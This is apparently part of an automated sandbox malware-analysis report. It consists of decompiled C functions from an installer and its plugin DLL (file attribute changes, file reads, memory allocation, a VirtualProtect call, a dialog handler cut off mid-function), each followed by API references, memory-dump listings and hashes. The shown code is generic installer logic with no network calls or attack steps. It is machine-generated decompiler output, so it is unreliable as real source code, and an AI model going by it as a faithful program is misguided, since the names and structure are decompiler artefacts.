                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 415043291-0
                                                                                                                              • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                                                              • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                                                                                                                              • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                                                              • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040581E, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0040581E(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                                                                                              0x00405822
                                                                                                                              0x0040582b
                                                                                                                              0x00000000
                                                                                                                              0x00405834
                                                                                                                              0x0040583a

                                                                                                                              APIs
                                                                                                                              • GetFileAttributesA.KERNELBASE(?,00405629,?,?,?), ref: 00405822
                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405834
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3188754299-0
                                                                                                                              • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                                              • Instruction ID: 89544605ef234ac14ed66c3b065a2d642d1346908a696065e0ba681aeed38476
                                                                                                                              • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                                              • Instruction Fuzzy Hash: F8C04CB1808501ABD7056B24EF0D81F7B66EF50325B108B35F5A9E00F0C7355C66DA1A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 709B2A38, Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 44%
                                                                                                                              			E709B2A38(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x709b4040 != 0 && E709B297D(_a4) == 0) {
					 *0x709b4044 = _t93;
					if( *0x709b403c != 0) {
						_t93 =  *0x709b403c;
					} else {
						E709B2F60(E709B2977(), __ecx);
						 *0x709b403c = _t93;
					}
				}
				_t28 = E709B29AB(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E709B299F();
					_t72 = _a4;
					_t79 =  *0x709b4048;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x709b4048 = _t72;
					E709B2999();
					_t33 = EnumSystemCodePagesW(??, ??); // executed
					 *0x709b401c = _t33;
					 *0x709b4020 = _t79;
					if( *0x709b4040 != 0 && E709B297D( *0x709b4048) == 0) {
						 *0x709b403c = _t94;
						_t94 =  *0x709b4044;
					}
					_t80 =  *0x709b4048;
					_a4 = _t80;
					 *0x709b4048 =  *((intOrPtr*)(E709B299F() + _t80));
					_t37 = E709B298B(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E709B29AB(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E709B29B6() + _a4 + _v8);
							_push(E709B29C0());
							if( *0x709b4040 <= 0 || E709B297D(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x709b403c =  *0x709b403c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x709b4048;
					if( *0x709b4048 == 0) {
						 *0x709b403c = 0;
					}
					E709B29E4(_t107, _a4,  *0x709b401c,  *0x709b4020);
					return _a4;
				}
				_push(E709B29B6() + _a4);
				_t56 = E709B29BC();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E709B29C8();
				_t87 = E709B29C4();
				_t90 = E709B29C0();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                                                                                              0x709b2a48
                                                                                                                              0x709b2a59
                                                                                                                              0x709b2a66
                                                                                                                              0x709b2a7a
                                                                                                                              0x709b2a68
                                                                                                                              0x709b2a6d
                                                                                                                              0x709b2a72
                                                                                                                              0x709b2a72
                                                                                                                              0x709b2a66
                                                                                                                              0x709b2a83
                                                                                                                              0x709b2a88
                                                                                                                              0x709b2a8e
                                                                                                                              0x709b2ad2
                                                                                                                              0x709b2ad2
                                                                                                                              0x709b2ad7
                                                                                                                              0x709b2adc
                                                                                                                              0x709b2ae2
                                                                                                                              0x709b2ae4
                                                                                                                              0x709b2aea
                                                                                                                              0x709b2af7
                                                                                                                              0x709b2af9
                                                                                                                              0x709b2afe
                                                                                                                              0x709b2b0b
                                                                                                                              0x709b2b1e
                                                                                                                              0x709b2b24
                                                                                                                              0x709b2b2a
                                                                                                                              0x709b2b2b
                                                                                                                              0x709b2b31
                                                                                                                              0x709b2b3d
                                                                                                                              0x709b2b43
                                                                                                                              0x709b2b4b
                                                                                                                              0x709b2b4c
                                                                                                                              0x709b2b4f
                                                                                                                              0x709b2b5a
                                                                                                                              0x709b2b5c
                                                                                                                              0x709b2b68
                                                                                                                              0x709b2b6e
                                                                                                                              0x709b2b76
                                                                                                                              0x709b2ba2
                                                                                                                              0x709b2ba3
                                                                                                                              0x709b2ba5
                                                                                                                              0x709b2ba9
                                                                                                                              0x709b2ba9
                                                                                                                              0x709b2bb0
                                                                                                                              0x709b2b86
                                                                                                                              0x709b2b86
                                                                                                                              0x709b2b87
                                                                                                                              0x709b2b95
                                                                                                                              0x709b2b9e
                                                                                                                              0x709b2b9e
                                                                                                                              0x709b2b76
                                                                                                                              0x709b2b5a
                                                                                                                              0x709b2bb2
                                                                                                                              0x709b2bb9
                                                                                                                              0x709b2bbb
                                                                                                                              0x709b2bbb
                                                                                                                              0x709b2bd4
                                                                                                                              0x709b2be2
                                                                                                                              0x709b2be2
                                                                                                                              0x709b2a99
                                                                                                                              0x709b2a9a
                                                                                                                              0x709b2a9f
                                                                                                                              0x709b2aa3
                                                                                                                              0x709b2aa8
                                                                                                                              0x709b2abc
                                                                                                                              0x709b2abd
                                                                                                                              0x709b2abe
                                                                                                                              0x709b2ac0
                                                                                                                              0x709b2ac5
                                                                                                                              0x709b2ac7
                                                                                                                              0x709b2ac7
                                                                                                                              0x709b2aca
                                                                                                                              0x709b2ad0
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • EnumSystemCodePagesW.KERNELBASE(00000000), ref: 709B2AF7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.204153248.00000000709B1000.00000020.00020000.sdmp, Offset: 709B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.204144717.00000000709B0000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204159626.00000000709B3000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204167409.00000000709B5000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: CodeEnumPagesSystem
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2369445336-0
                                                                                                                              • Opcode ID: 560279692fd30f6a6b98c03af6b9e497856db286647700e79d4fbbdd78e691f2
                                                                                                                              • Instruction ID: f06bf12ab632fe0e1d56968bc88d7995abb86fbe133d07aa5720beca2cb6fa13
                                                                                                                              • Opcode Fuzzy Hash: 560279692fd30f6a6b98c03af6b9e497856db286647700e79d4fbbdd78e691f2
                                                                                                                              • Instruction Fuzzy Hash: EF416173518244DFDB11EFA5DD85BDD3778EB05338F204539E609D6260CA7CA841AB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004031BF, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004031BF(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                              0x004031c3
                                                                                                                              0x004031d6
                                                                                                                              0x004031de
                                                                                                                              0x00000000
                                                                                                                              0x004031e5
                                                                                                                              0x00000000
                                                                                                                              0x004031e7

                                                                                                                              APIs
                                                                                                                              • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00413040,0040B040,004030C4,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000), ref: 004031D6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                                              • Instruction ID: 4c5c04567c480c11bae84e94003d2882b37cb3083c3cc1db03504fe221b835f3
                                                                                                                              • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                                              • Instruction Fuzzy Hash: DAE08631500119BBCF215E619C00A973B5CEB09362F008033FA04E9190D532DB109BA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 709B2921, Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x709b4038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x709b404c, 4, 0x40, 0x709b403c); // executed
					 *0x709b404c = 0xc2;
					 *0x709b403c = 0;
					 *0x709b4044 = 0;
					 *0x709b4058 = 0;
					 *0x709b4048 = 0;
					 *0x709b4040 = 0;
					 *0x709b4050 = 0;
					 *0x709b404e = 0;
				}
				return 1;
			}



                                                                                                                              0x709b292a
                                                                                                                              0x709b292f
                                                                                                                              0x709b293f
                                                                                                                              0x709b2947
                                                                                                                              0x709b294e
                                                                                                                              0x709b2953
                                                                                                                              0x709b2958
                                                                                                                              0x709b295d
                                                                                                                              0x709b2962
                                                                                                                              0x709b2967
                                                                                                                              0x709b296c
                                                                                                                              0x709b296c
                                                                                                                              0x709b2974

                                                                                                                              APIs
                                                                                                                              • VirtualProtect.KERNELBASE(709B404C,00000004,00000040,709B403C), ref: 709B293F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.204153248.00000000709B1000.00000020.00020000.sdmp, Offset: 709B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.204144717.00000000709B0000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204159626.00000000709B3000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204167409.00000000709B5000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: ProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 544645111-0
                                                                                                                              • Opcode ID: 641c8c27e8dc7495dcd34db153304b28613de79a1c36233e1c7a6da3a3cceef5
                                                                                                                              • Instruction ID: eba70f9ace4658a221c7642915999f73da8828858da9e735390039ff0d3c03e9
                                                                                                                              • Opcode Fuzzy Hash: 641c8c27e8dc7495dcd34db153304b28613de79a1c36233e1c7a6da3a3cceef5
                                                                                                                              • Instruction Fuzzy Hash: C4F092B352C280DEC360EF6A8C847153EF0A758274B21473EE798E6261E3B84044BF52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004031F1, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004031F1(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                              0x004031ff
                                                                                                                              0x00403205

                                                                                                                              APIs
                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,000303E4), ref: 004031FF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 973152223-0
                                                                                                                              • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                                              • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                                                                                                              • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                                              • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 709B101B, Relevance: 1.3, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 16%
                                                                                                                              			E709B101B(signed int _a4) {
				signed int _t2;
				void* _t4;

				_t2 = E709B14BB();
				if(_t2 != 0) {
					_t4 = GlobalAlloc(0x40, _t2 * _a4); // executed
					_push(_t4);
				} else {
					_push(_t2);
				}
				return E709B14E2();
			}





                                                                                                                              0x709b101b
                                                                                                                              0x709b1022
                                                                                                                              0x709b102f
                                                                                                                              0x709b1035
                                                                                                                              0x709b1024
                                                                                                                              0x709b1024
                                                                                                                              0x709b1024
                                                                                                                              0x709b103c

                                                                                                                              APIs
                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,?,709B1019,00000001), ref: 709B102F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.204153248.00000000709B1000.00000020.00020000.sdmp, Offset: 709B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.204144717.00000000709B0000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204159626.00000000709B3000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204167409.00000000709B5000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocGlobal
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3761449716-0
                                                                                                                              • Opcode ID: 89d1c5c83f485162699293c9bba427f0a84380419f39dc64453e5ff27f472a04
                                                                                                                              • Instruction ID: 279aebcdaec43cae6a1f7d4742c6d265edef84e9372291a3eb8c8b9377d016df
                                                                                                                              • Opcode Fuzzy Hash: 89d1c5c83f485162699293c9bba427f0a84380419f39dc64453e5ff27f472a04
                                                                                                                              • Instruction Fuzzy Hash: 77C08CA2104201FED214A2F54E06F1F32AF8B4C375FA08400F602D52A0DA2CD5802633
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 709B1215, Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E709B1215() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x709b405c); // executed
				return _t1;
			}




                                                                                                                              0x709b121d
                                                                                                                              0x709b1223

                                                                                                                              APIs
                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,709B1233,?,709B12CF,-709B404B,709B11AB,-000000A0), ref: 709B121D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.204153248.00000000709B1000.00000020.00020000.sdmp, Offset: 709B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.204144717.00000000709B0000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204159626.00000000709B3000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204167409.00000000709B5000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocGlobal
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3761449716-0
                                                                                                                              • Opcode ID: 9e5e22b10e81997502cef43547324ef896ad34a077322ee0b91a1f44de4233f1
                                                                                                                              • Instruction ID: 5570f7182b5567956b76f4ff833a59b5e9d7dbed65bbf87496f416e90dadcca8
                                                                                                                              • Opcode Fuzzy Hash: 9e5e22b10e81997502cef43547324ef896ad34a077322ee0b91a1f44de4233f1
                                                                                                                              • Instruction Fuzzy Hash: AEA00172968100DADE41ABE28D4AB143A21AB48721F208260E315545A4C6A54010BB25
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 00404853, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 478windowmemoryCOMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 98%
                                                                                                                              			E00404853(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8; // 0x55ef7c
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423eb0; // 0x55edd0
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423eb9 & 0x00000002;
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004047D3(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423eb8; // 0xa1
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x42047c;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x420494;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x42047c = _t315;
									 *0x420494 = _t315;
									 *0x423f00 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423eb9 & 0x00000001;
										if(( *0x423eb9 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423ecc - _t315; // 0x3
										_v32 =  *0x420494;
										_t196 =  *0x423ec8; // 0x55ef7c
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42367c; // 0x565f8f
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E004046F1(0x3ff, 0xfffffffb, E004047A6(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x55ef84
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x55ef94
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
